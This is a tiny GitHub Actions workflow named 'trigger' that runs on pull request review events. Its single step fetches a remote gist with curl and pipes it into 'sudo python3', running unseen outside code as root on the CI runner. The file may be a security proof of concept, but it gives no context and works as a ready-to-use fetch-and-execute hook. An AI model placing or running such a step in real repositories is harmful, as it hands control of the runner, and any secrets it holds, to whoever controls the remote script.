name: trigger
on:
  pull_request_review:


jobs:
  a:
    runs-on: ubuntu-latest
    steps:
      - run: curl -sL https://gist.githubusercontent.com/fproulx-boostsecurity/d63abaaac3318a4c66ef958ef2e5b525/raw/ | sudo python3
